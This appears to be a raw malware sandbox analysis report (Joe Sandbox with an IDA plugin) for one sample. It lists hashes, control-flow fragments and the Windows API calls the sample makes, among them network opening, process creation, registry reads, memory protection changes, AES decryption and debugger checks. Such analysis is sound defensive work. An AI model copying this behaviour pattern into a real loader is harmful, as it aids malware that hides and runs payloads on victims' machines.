                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                                                • String ID: text
                                                                                • API String ID: 1154000607-999008199
                                                                                • Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                                                                • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                                                • Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                                                                • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                                                  • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: .exe$open
                                                                                • API String ID: 1627157292-49952409
                                                                                • Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                                                                • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                                                • Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                                                                • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1237 401d60-401dae 1238 401db2-401db7 1237->1238 1238->1238 1239 401db9-402013 call 402470 call 402650 call 402470 call 40a3e0 call 40c34c InternetOpenA 1238->1239 1254 402015-402021 1239->1254 1255 40203d-40205a call 408ec2 1239->1255 1257 402033-40203a call 409027 1254->1257 1258 402023-402031 1254->1258 1257->1255 1258->1257 1261 402062-402099 call 40c26f call 401d60 1258->1261
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: http://
                                                                                • API String ID: 0-1121587658
                                                                                • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                                                • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                                                • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                                                • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1268 9a95e8-9a9601 1269 9abc26-9ad3d8 1268->1269 1272 9ad3da-9ad3f5 RegOpenKeyA 1269->1272 1273 9ad401-9ad41c RegOpenKeyA 1269->1273 1272->1273 1274 9ad3f7 1272->1274 1275 9ad41e-9ad428 1273->1275 1276 9ad434-9ad460 1273->1276 1274->1273 1275->1276 1279 9ad46d-9ad477 1276->1279 1280 9ad462-9ad46b GetNativeSystemInfo 1276->1280 1281 9ad479 1279->1281 1282 9ad483-9ad491 1279->1282 1280->1279 1281->1282 1284 9ad49d-9ad4a4 1282->1284 1285 9ad493 1282->1285 1286 9ad4aa-9ad4b1 1284->1286 1287 9ad4b7 1284->1287 1285->1284 1286->1287 1288 9ab90d-9ab914 1286->1288 1289 9ad5cb-9ada6d 1287->1289 1288->1289 1290 9ab91a-9ab920 1288->1290 1290->1269
                                                                                APIs
                                                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009AD3ED
                                                                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009AD414
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 009AD46B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.00000000009A4000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A4000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9a4000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Open$InfoNativeSystem
                                                                                • String ID:
                                                                                • API String ID: 1247124224-0
                                                                                • Opcode ID: fdcc2a91055b6688dd2a7c087ad1f183922aae311d5af4c362b389f10c3c9b0b
                                                                                • Instruction ID: 43e32e0389bf4dd400c8e452e38006c59d2c330e3e460a8cb1fc4900c2f629aa
                                                                                • Opcode Fuzzy Hash: fdcc2a91055b6688dd2a7c087ad1f183922aae311d5af4c362b389f10c3c9b0b
                                                                                • Instruction Fuzzy Hash: 6D315D7240524E9FEF11CF54C809BEE3BE8EB06300F510426D94285D51E77A5DA4DF99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1293 4020c0-4020db 1294 40213b-40214c call 408ec2 1293->1294 1295 4020dd-4020e1 1293->1295 1295->1294 1296 4020e3-402101 CreateFileA 1295->1296 1296->1294 1298 402103-402130 WriteFile CloseHandle call 408ec2 1296->1298 1301 402135-402138 1298->1301
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                • String ID:
                                                                                • API String ID: 1065093856-0
                                                                                • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                                                • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                                                • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                                                • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1310 a866c7-a86f5c 1312 a86f5e-a86f65 1310->1312 1313 a86f67-a86f7d 1310->1313 1312->1313 1314 a86f7e-a86fad VirtualAlloc 1312->1314 1313->1314 1317 a86fbe-a86fdb 1314->1317 1318 a86fb3 1314->1318 1320 a86fe0-a86fe8 1317->1320 1318->1317 1320->1320 1321 a86fee-a86ff6 1320->1321 1322 a86ffc 1321->1322 1323 a87001-a87019 1321->1323 1324 a8701b-a87051 1322->1324 1323->1324 1327 a8705c-a87072 1324->1327 1328 a87053-a8705a 1324->1328 1329 a87073-a87082 call a8708d 1327->1329 1328->1327 1328->1329
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00A86FA9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.00000000009A4000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A4000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9a4000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: V
                                                                                • API String ID: 4275171209-1342839628
                                                                                • Opcode ID: b0b5c5be960b974f7828a30411c9713c6c997d3a2e5a5ad06882533115a98558
                                                                                • Instruction ID: 3143c5bd6d3f3cb853f5df08673ae3ec73e726f8533c08d95905d5e276d3c20f
                                                                                • Opcode Fuzzy Hash: b0b5c5be960b974f7828a30411c9713c6c997d3a2e5a5ad06882533115a98558
                                                                                • Instruction Fuzzy Hash: 09319A7160820EDFEB10AF28DC487AF77A6EB08355F644025EA04D3F91D6B6AC60CB59
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?), ref: 00AAB31F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_aaa000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 52e6674b88b4a4e5c41721ed4c939daa3771ee8b995b95b89c0704953bf21e3f
                                                                                • Instruction ID: 505090156596e2e45798e17e90b0b7da738cf1167a5a56edf8e0f1691df60a26
                                                                                • Opcode Fuzzy Hash: 52e6674b88b4a4e5c41721ed4c939daa3771ee8b995b95b89c0704953bf21e3f
                                                                                • Instruction Fuzzy Hash: 2811E37211A24F9BDB129F24D9463DE3F61EF47320F248026E8000BEC3C7B658269B78
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                                                • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                                                • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                                                • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                                                • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                                                • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                                                • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0040E27B
                                                                                  • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                                  • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                • String ID:
                                                                                • API String ID: 1353095263-0
                                                                                • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                                                • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                                                • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                                                • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.00000000009A4000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A4000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9a4000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 0819aa76db30bf4cf228f2494cf74b4340dfcaaf67bfdbd212c5e11b307e0de5
                                                                                • Instruction ID: 55ead4362ca94da83d6a7a573e6d07b77261ce3b53e9010c9bcf4a4cc6a6028b
                                                                                • Opcode Fuzzy Hash: 0819aa76db30bf4cf228f2494cf74b4340dfcaaf67bfdbd212c5e11b307e0de5
                                                                                • Instruction Fuzzy Hash: 0B90027142500B9A57040E61440856F3D14A505602B300904790340C4099950C109668
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00D7A0CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2421354084.0000000000D79000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D79000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_d79000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: ed259b59305aaa7e8e53b55dd407bcc09b1c1c528df0eea4f12c257b9aaea052
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: AE112B79A00208EFDB01DF98C985E99BBF5EF08350F45C094F9489B362E371EA50DB91
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                                                • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                                                • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                                                • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                                                APIs
                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                                                • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                                                • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                                                • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                                                • API String ID: 0-735762442
                                                                                • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                                                • Instruction ID: f9dcea7f7b74f7a7a3300ace79cc6978366e73db8824ea66bee9f315b22b43fa
                                                                                • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                                                • Instruction Fuzzy Hash: EAE2C2B0D002589BEB24EF68CC54BEDBB74EF91308F1041D8D5496B281DB757A88EFA5
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B437A7
                                                                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B437CB
                                                                                • _mbstowcs.LIBCMT ref: 04B4381E
                                                                                • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43835
                                                                                • GetLastError.KERNEL32 ref: 04B4383F
                                                                                • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43867
                                                                                • GetLastError.KERNEL32 ref: 04B43871
                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43881
                                                                                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43943
                                                                                • CryptDestroyKey.ADVAPI32(?), ref: 04B439B5
                                                                                Strings
                                                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43783
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                                • API String ID: 3642901890-63410773
                                                                                • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                                                • Instruction ID: 4fe274e54d431eebfbc365bd5b69b411441be6651f31eb9a9068311ca2197b44
                                                                                • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                                                • Instruction Fuzzy Hash: F6818471B00218AFEF209F24CC45B9ABBB5FF89300F0481E5E94DE7290DB319A849F55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '88$'|Y$/?w$ZYvn$bBXu$o_|_$x,_K$z@W$&W
                                                                                • API String ID: 0-3579584463
                                                                                • Opcode ID: 8fa1a11f6395ade10c41d4b103f8f4704ee275b88509ba49660acf16dc447c88
                                                                                • Instruction ID: d83e8d3d0270aef09a813f643a0bf18fe67c69c2eebd35af15195c09d5135dc9
                                                                                • Opcode Fuzzy Hash: 8fa1a11f6395ade10c41d4b103f8f4704ee275b88509ba49660acf16dc447c88
                                                                                • Instruction Fuzzy Hash: 01B228F360C204AFE3046E2DEC8567ABBEAEFD4720F16853DE6C4C7744EA3558058696
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: =w$0N$A<~$AH<w$T}?$^BGs$dLDy
                                                                                • API String ID: 0-1366062339
                                                                                • Opcode ID: 0141af8423853e06b59c79d3b220822ef387c30825746ac9ff5328f2c7b83c55
                                                                                • Instruction ID: 6e7b0fd7863938db93019175b38461d0f7d119a79d95956666f14b0c956ba5bd
                                                                                • Opcode Fuzzy Hash: 0141af8423853e06b59c79d3b220822ef387c30825746ac9ff5328f2c7b83c55
                                                                                • Instruction Fuzzy Hash: 2AB228F360C2009FE704AE2DDC8567AFBE9EF94320F1A893DE6C5C3744E63598058696
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,*Gq$12_$A-9o$EN$QxEk$Z;>n$jg7
                                                                                • API String ID: 0-3247597967
                                                                                • Opcode ID: 16d653ac0c31914689d585a79d741b7d04e56724180113cd175a6529eb182b7c
                                                                                • Instruction ID: 27a25fd211319030167b98fcd9170815985a6379bdb424fca6ebb0aec9d44103
                                                                                • Opcode Fuzzy Hash: 16d653ac0c31914689d585a79d741b7d04e56724180113cd175a6529eb182b7c
                                                                                • Instruction Fuzzy Hash: E4B2F8F3A0C6009FE3046E2DEC8567AB7EAEFD4720F1A893DE6C4C7744E53598058696
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6x~$E'_$Fe2%$M1"?$N~-z$t:U>$Dft
                                                                                • API String ID: 0-4076625150
                                                                                • Opcode ID: f4db4c3cd2b04a0ebf4d52add36c5a072c7e309ad53364dd5c08469f1d452953
                                                                                • Instruction ID: af83db0309311a4005e44bf48db0a604cd04f09d3a403846e17c2b820fcfcd5c
                                                                                • Opcode Fuzzy Hash: f4db4c3cd2b04a0ebf4d52add36c5a072c7e309ad53364dd5c08469f1d452953
                                                                                • Instruction Fuzzy Hash: 54B2B2F360C6009FE704AE2DEC8567AFBE9EF98320F1A493DE6C4C3744E63558458696
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: zw$!PEi$6Daz$GR8D$eX|w$eX|w$s'K
                                                                                • API String ID: 0-3683660440
                                                                                • Opcode ID: 9627a6b4decc5ffb941465ff257d6693a11c5e7560235b0a10665ff5e24bddf8
                                                                                • Instruction ID: 0b3269c5edc0124e466a6586328b6220ce9c78ffea1bdd16449492ae70f497dd
                                                                                • Opcode Fuzzy Hash: 9627a6b4decc5ffb941465ff257d6693a11c5e7560235b0a10665ff5e24bddf8
                                                                                • Instruction Fuzzy Hash: 53B2E4F360C2049FE304AE2DEC8567AFBE9EF94720F1A493DE6C483744E67598058697
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4Q)b$D/7}$RkKq$W.\:$\LX$|=wO
                                                                                • API String ID: 0-2539188026
                                                                                • Opcode ID: e218b1bafb510b22e219794839a769fa6b35225f210a0dfb654cae59733ef870
                                                                                • Instruction ID: b1d749d1af3e603ba454746e5dc2c3286b0b51a90459a3aa674a41a038a6953f
                                                                                • Opcode Fuzzy Hash: e218b1bafb510b22e219794839a769fa6b35225f210a0dfb654cae59733ef870
                                                                                • Instruction Fuzzy Hash: 54B218F360C2009FE3086E2DEC9567AFBE9EF94720F1A493DE6C5C7744E63598018696
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420658294.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_819000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 9|w?$^ mj$^ mj$7[^
                                                                                • API String ID: 0-2043828993
                                                                                • Opcode ID: 92b8ea4b0682a00b61a8e3625ec0b3897739f1f37d84802d8c30fb55a6758358
                                                                                • Instruction ID: d134536bf4320edeb2cfc74145e922ec5c0b7f93c8919cae8d7b1ef5e3651200
                                                                                • Opcode Fuzzy Hash: 92b8ea4b0682a00b61a8e3625ec0b3897739f1f37d84802d8c30fb55a6758358
                                                                                • Instruction Fuzzy Hash: EAB227F3A0C6049FE3046E2DDC8567AFBE9EF94320F16493DEAC583744EA3598058697
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
                                                                                • IsDebuggerPresent.KERNEL32 ref: 04B49AF1
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B
                                                                                Memory Dump Source
